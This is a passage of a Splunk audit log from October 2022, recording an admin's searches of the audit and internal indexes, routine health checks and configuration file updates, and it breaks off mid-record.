Audit:[timestamp=10-06-2022 18:11:31.712, user=admin, action=search, info=granted REST: /search/jobs/1665079861.52/control] Audit:[timestamp=10-06-2022 18:11:29.814, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:11:19.820, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:11:16.719, user=admin, action=search, info=granted REST: /search/jobs/1665079861.52/control] Audit:[timestamp=10-06-2022 18:11:09.813, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:11:06.304, user=admin, action=search, info=completed, search_id='1665079861.52', has_error_warn=false, fully_completed_search=true, total_run_time=0.31, event_count=9499, result_count=3456, available_count=3456, scan_count=9499, drop_count=0, exec_time=1665079861, api_et=1665076260.000000000, api_lt=1665079861.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1665076260.000000000, search_lt=1665079861.000000000, is_realtime=0, savedsearch_name="", search_startup_time="59", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_8473009b38de1652", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=2, eliminated_buckets=0, considered_events=9499, total_slices=19, decompressed_slices=23, duration.command.search.index=3, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=37, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, sourcetype_count__audittrail=9499, roles='admin+power+user', search='search index=_audit'] Audit:[timestamp=10-06-2022 18:11:01.793, user=admin, action=search, info=granted REST: /search/jobs/1665079861.52/timeline] Audit:[timestamp=10-06-2022 18:11:01.791, user=admin, action=search, info=granted REST: /search/jobs/1665079861.52/events] Audit:[timestamp=10-06-2022 18:11:01.712, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:11:01.712, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:11:01.711, user=admin, action=search, info=granted REST: /search/jobs/1665079861.52] Audit:[timestamp=10-06-2022 18:11:01.706, user=admin, action=search, info=granted REST: /search/jobs/1665079861.52/summary] Audit:[timestamp=10-06-2022 18:11:01.688, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:11:01.648, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:11:01.648, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:11:01.647, user=admin, action=search, info=granted REST: /search/jobs/1665079861.52] Audit:[timestamp=10-06-2022 18:11:01.564, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:11:01.564, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:11:01.563, user=admin, action=search, info=granted REST: /search/jobs/1665079861.52] Audit:[timestamp=10-06-2022 18:11:01.558, user=admin, action=search, info=granted REST: /search/jobs/1665079861.52/events] Audit:[timestamp=10-06-2022 18:11:01.547, user=admin, action=search, info=granted REST: /search/jobs/1665079861.52/summary] Audit:[timestamp=10-06-2022 18:11:01.413, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:11:01.274, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:11:01.274, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:11:01.273, user=admin, action=search, info=granted REST: /search/jobs/1665079861.52] Audit:[timestamp=10-06-2022 18:11:01.139, user=admin, action=quota,search_id=1665079861.52, elapsed_ms=1, cache_size=12] Audit:[timestamp=10-06-2022 18:11:01.138, user=admin, action=search, info=granted , search_id='1665079861.52', search='search index=_audit', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Thu Oct 6 17:11:00 2022', apiEndTime='Thu Oct 6 18:11:01 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 18:11:01.137, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:11:01.127, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:11:00.978, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:11:00.978, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:11:00.978, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:11:00.978, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:11:00.901, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:10:59.812, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:10:53.805, user=admin, action=search, info=granted , search_id='ta_1665079853.51', search='typeahead prefix="index=_audit a" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:10:52.881, user=admin, action=search, info=granted REST: /search/jobs/1665079807.50/control] Audit:[timestamp=10-06-2022 18:10:49.814, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:10:39.823, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:10:37.894, user=admin, action=search, info=granted REST: /search/jobs/1665079807.50/control] Audit:[timestamp=10-06-2022 18:10:36.304, user=admin, action=search, info=completed, search_id='1665079807.50', has_error_warn=false, fully_completed_search=true, total_run_time=0.15, event_count=22, result_count=2, available_count=22, scan_count=585, drop_count=0, exec_time=1665079807, api_et=1664992800.000000000, api_lt=1665079807.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664992800.000000000, search_lt=1665079807.000000000, is_realtime=0, savedsearch_name="", search_startup_time="126", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_7fe11c81226e2df9", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=2, eliminated_buckets=0, considered_events=585, total_slices=19, decompressed_slices=7, duration.command.search.index=1, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=23, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, sourcetype_count__audittrail=22, roles='admin+power+user', search='search index=_audit action=search info=granted search=* NOT "search_id='scheduler" NOT "search='|history" NOT "user=splunk-system-user" NOT "search='typeahead" NOT "search='| metadata type=* | search totalCount>0" | stats count by user search _time | sort _time | convert ctime(_time) | stats list(_time) as time list(search) as search by user'] Audit:[timestamp=10-06-2022 18:10:29.817, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:10:22.885, user=admin, action=search, info=granted REST: /search/jobs/1665079807.50/control] Audit:[timestamp=10-06-2022 18:10:19.812, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:10:09.814, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:10:08.081, user=admin, action=search, info=granted REST: /search/jobs/1665079807.50/results_preview] Audit:[timestamp=10-06-2022 18:10:07.943, user=admin, action=search, info=granted REST: /search/jobs/1665079807.50/results_preview] Audit:[timestamp=10-06-2022 18:10:07.936, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:10:07.936, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:10:07.935, user=admin, action=search, info=granted REST: /search/jobs/1665079807.50] Audit:[timestamp=10-06-2022 18:10:07.930, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:10:07.805, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:10:07.805, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:10:07.804, user=admin, action=search, info=granted REST: /search/jobs/1665079807.50] Audit:[timestamp=10-06-2022 18:10:07.800, user=admin, action=search, info=granted REST: /search/parser] Audit:[timestamp=10-06-2022 18:10:07.742, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:10:07.742, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:10:07.741, user=admin, action=search, info=granted REST: /search/jobs/1665079807.50] Audit:[timestamp=10-06-2022 18:10:07.533, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:10:07.387, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:10:07.387, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:10:07.386, user=admin, action=search, info=granted REST: /search/jobs/1665079807.50] Audit:[timestamp=10-06-2022 18:10:07.248, user=admin, action=quota,search_id=1665079807.50, elapsed_ms=1, cache_size=12] Audit:[timestamp=10-06-2022 18:10:07.247, user=admin, action=search, info=granted , search_id='1665079807.50', search='search index=_audit action=search info=granted search=* NOT "search_id='scheduler" NOT "search='|history" NOT "user=splunk-system-user" NOT "search='typeahead" NOT "search='| metadata type=* | search totalCount>0" | stats count by user search _time | sort _time | convert ctime(_time) | stats list(_time) as time list(search) as search by user', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 18:00:00 2022', apiEndTime='Thu Oct 6 18:10:07 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 18:10:07.247, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:10:07.210, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:10:07.059, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:10:07.059, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:10:07.059, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:10:07.059, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:09:59.984, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:09:50.081, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:09:39.976, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:09:29.937, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:09:19.817, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:09:09.811, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:08:59.812, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:08:52.948, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:08:52.757, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:08:52.607, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:08:52.301, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:08:52.147, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:08:52.147, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:08:52.147, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:08:52.147, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:08:49.813, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:08:39.811, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:08:30.661, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:08:30.477, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:08:30.334, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:08:30.087, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:08:29.939, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:08:29.939, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:08:29.939, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:08:29.939, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:08:29.812, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:08:20.584, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:08:20.384, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:08:20.239, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:08:19.946, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:08:19.808, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:08:19.790, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:08:19.790, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:08:19.790, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:08:19.790, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:08:11.981, user=admin, action=search, info=granted REST: /search/jobs/1665079570.49/control] Audit:[timestamp=10-06-2022 18:08:09.982, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:07:59.947, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:07:56.893, user=admin, action=search, info=granted REST: /search/jobs/1665079570.49/control] Audit:[timestamp=10-06-2022 18:07:50.010, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:07:42.077, user=admin, action=search, info=granted REST: /search/jobs/1665079570.49/control] Audit:[timestamp=10-06-2022 18:07:40.140, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:07:29.896, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:07:26.961, user=admin, action=search, info=granted REST: /search/jobs/1665079570.49/control] Audit:[timestamp=10-06-2022 18:07:19.976, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:07:11.979, user=admin, action=search, info=granted REST: /search/jobs/1665079570.49/control] Audit:[timestamp=10-06-2022 18:07:09.977, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:07:06.256, user=admin, action=search, info=canceled, search_id='ta_1665079565.48', has_error_warn=false, fully_completed_search=true, total_run_time=0.02, event_count=0, result_count=29, available_count=0, scan_count=0, drop_count=0, exec_time=1665079565, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="0", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_b87b14f51c6ac9eb", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal sear" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:06:59.899, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:06:56.981, user=admin, action=search, info=granted REST: /search/jobs/1665079570.49/control] Audit:[timestamp=10-06-2022 18:06:50.009, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:06:41.761, user=admin, action=search, info=granted REST: /search/jobs/1665079570.49/control] Audit:[timestamp=10-06-2022 18:06:41.152, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:06:36.304, user=admin, action=search, info=completed, search_id='1665079570.49', has_error_warn=false, fully_completed_search=true, total_run_time=0.13, event_count=0, result_count=0, available_count=0, scan_count=15, drop_count=0, exec_time=1665079570, api_et=1664992800.000000000, api_lt=1665079570.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664992800.000000000, search_lt=1665079570.000000000, is_realtime=0, savedsearch_name="", search_startup_time="60", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_6d32e81c144ef1ab", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=2, eliminated_buckets=1, considered_events=15, total_slices=26, decompressed_slices=5, duration.command.search.index=1, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=22, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='search index=_internal search="sendalert"'] Audit:[timestamp=10-06-2022 18:06:29.809, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:06:26.171, user=admin, action=search, info=granted REST: /search/jobs/1665079570.49/control] Audit:[timestamp=10-06-2022 18:06:19.820, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:06:11.413, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:06:11.309, user=admin, action=search, info=granted REST: /search/jobs/1665079570.49/events] Audit:[timestamp=10-06-2022 18:06:11.309, user=admin, action=search, info=granted REST: /search/jobs/1665079570.49/summary] Audit:[timestamp=10-06-2022 18:06:11.169, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:06:11.026, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:06:11.026, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:06:11.025, user=admin, action=search, info=granted REST: /search/jobs/1665079570.49] Audit:[timestamp=10-06-2022 18:06:10.871, user=admin, action=quota,search_id=1665079570.49, elapsed_ms=1, cache_size=11] Audit:[timestamp=10-06-2022 18:06:10.870, user=admin, action=search, info=granted , search_id='1665079570.49', search='search index=_internal search="sendalert"', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 18:00:00 2022', apiEndTime='Thu Oct 6 18:06:10 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 18:06:10.869, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:06:10.862, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:06:10.709, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:06:10.709, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:06:10.708, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:06:10.708, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:06:09.810, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:06:05.345, user=admin, action=search, info=granted , search_id='ta_1665079565.48', search='typeahead prefix="index=_internal sear" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:06:00.839, user=admin, action=search, info=granted REST: /search/jobs/1665079455.47/control] Audit:[timestamp=10-06-2022 18:05:59.980, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:05:50.029, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:05:45.980, user=admin, action=search, info=granted REST: /search/jobs/1665079455.47/control] Audit:[timestamp=10-06-2022 18:05:39.909, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:05:30.845, user=admin, action=search, info=granted REST: /search/jobs/1665079455.47/control] Audit:[timestamp=10-06-2022 18:05:29.978, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:05:21.144, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:05:15.988, user=admin, action=search, info=granted REST: /search/jobs/1665079455.47/control] Audit:[timestamp=10-06-2022 18:05:13.899, user=n/a, action=update,path="/opt/splunk/etc/users/admin/search/history/so1.csv", isdir=0, size=5129, gid=41812, uid=41812, modtime="Thu Oct 6 18:04:36 2022", mode="rw-------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 18:05:13.895, user=n/a, action=update,path="/opt/splunk/etc/users/admin/search/metadata/local.meta", isdir=0, size=208, gid=41812, uid=41812, modtime="Thu Oct 6 17:58:57 2022", mode="rw-------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 18:05:13.891, user=n/a, action=add,path="/opt/splunk/etc/users/admin/search/local/ui-prefs.conf", isdir=0, size=44, gid=41812, uid=41812, modtime="Thu Oct 6 17:58:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 18:05:13.888, user=n/a, action=update,path="/opt/splunk/etc/users/admin/search/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:58:57 2022", mode="rwx------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 18:05:13.884, user=n/a, action=update,path="/opt/splunk/etc/users/admin/search/local", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:58:57 2022", mode="rwx------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 18:05:13.881, user=n/a, action=update,path="/opt/splunk/etc/users/admin/search/history", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 18:04:36 2022", mode="rwx------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 18:05:13.777, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/system/history/.dummy_history", isdir=0, size=0, gid=41812, uid=41812, modtime="Thu Oct 6 18:02:06 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 18:05:13.773, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/system/metadata/local.meta", isdir=0, size=72, gid=41812, uid=41812, modtime="Thu Oct 6 18:02:06 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 18:05:13.769, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/system/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 18:02:06 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 18:05:13.766, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/system/history", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 18:02:06 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 18:05:13.661, user=n/a, action=add,path="/opt/splunk/etc/users/splunk-system-user/system", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 18:02:06 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 18:05:13.558, user=n/a, action=update,path="/opt/splunk/etc/users/splunk-system-user", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 18:02:06 2022", mode="rwx------", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 18:05:12.447, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/__pycache__/metrics_collection_manager.cpython-37.pyc", isdir=0, size=4708, gid=41812, uid=41812, modtime="Thu Oct 6 18:00:00 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 18:05:12.443, user=n/a, action=update,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 18:00:00 2022", mode="rwx--x---", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 18:05:11.735, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/schedule_manager.cpython-37.pyc", isdir=0, size=3827, gid=41812, uid=41812, modtime="Thu Oct 6 18:00:00 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 18:05:11.731, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__/input.cpython-37.pyc", isdir=0, size=4123, gid=41812, uid=41812, modtime="Thu Oct 6 18:00:00 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 18:05:11.226, user=n/a, action=update,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 18:00:00 2022", mode="rwx--x---", hash=, chgs="modtime "] Audit:[timestamp=10-06-2022 18:05:09.975, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:05:00.828, user=admin, action=search, info=granted REST: /search/jobs/1665079455.47/control] Audit:[timestamp=10-06-2022 18:05:00.006, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:04:50.017, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:04:45.402, user=admin, action=search, info=granted REST: /search/jobs/1665079455.47/control] Audit:[timestamp=10-06-2022 18:04:39.813, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:04:36.307, user=admin, action=search, info=canceled, search_id='ta_1665079388.41', has_error_warn=true, fully_completed_search=true, total_run_time=0.00, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079388, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="0", is_prjob=false, app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:04:36.306, user=admin, action=search, info=canceled, search_id='ta_1665079391.44', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079391, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="10", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_22fdfab9236d68c6", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, 